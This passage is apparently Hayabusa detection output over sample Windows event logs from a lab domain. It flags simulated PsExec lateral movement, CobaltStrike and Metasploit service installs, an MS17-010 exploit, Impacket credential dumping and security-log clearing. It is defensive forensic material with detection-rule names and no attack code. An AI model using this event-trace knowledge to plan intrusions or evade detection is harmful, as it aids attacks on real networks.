+09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56662 : LogonID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56663 : LogonID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56664 : LogonID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56666 : LogonID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.362 +09:00,srvdefender01.offsec.lan,4674,critical,SCM Database Privileged Operation,,rules/sigma/builtin/security/win_scm_database_privileged_operation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 22:30:00.589 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\eviltask timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- -2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx -2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx -2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx -2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: 0Konuy9q8HtkWeKS : IP Address: 10.23.123.11 : Port: 41747 : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60285 : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60232 : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50078 : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 